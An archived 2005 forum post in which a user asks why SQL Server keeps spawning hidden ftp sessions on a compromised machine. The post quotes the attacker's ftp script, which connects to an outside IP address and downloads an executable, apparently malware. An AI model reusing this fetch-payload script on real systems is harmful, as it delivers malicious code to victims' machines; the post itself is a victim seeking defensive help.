malicious process...
From: François G. (francoisg_at_discussions.microsoft.com)
Date: 04/28/05
- Next message: Mike Epprecht (SQL MVP): "RE: malicious process..."
- Previous message: Jens Süßmeyer: "Re: Login failed for user 'sa'"
- Next in thread: Mike Epprecht (SQL MVP): "RE: malicious process..."
- Reply: Mike Epprecht (SQL MVP): "RE: malicious process..."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Thu, 28 Apr 2005 03:53:34 -0700
Hi,
Since I installed a firewall on my machine, it regularly
detects unexpected ftp sessions.
Thanks to a process explorer, I remarked that ftp is
launched from a (hidden) cmd.exe, itself lauched by
sql.exe (for your info, the ftp command line is : "ftp -n -
s:???.txt" where ???.txt is a textfile in \system32\ ).
What SQL subsystem is able to launch such a process? a
stored procedure? a trigger? (fyi, SQLAgent is not
running). How can I prevent this to occur?
Thank you for your help,
François
Note - contents of the textfile :
open 81.244.183.229 19470
user itqavjflw itqavjflw
get SCardClnt.exe
quit
- Next message: Mike Epprecht (SQL MVP): "RE: malicious process..."
- Previous message: Jens Süßmeyer: "Re: Login failed for user 'sa'"
- Next in thread: Mike Epprecht (SQL MVP): "RE: malicious process..."
- Reply: Mike Epprecht (SQL MVP): "RE: malicious process..."
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
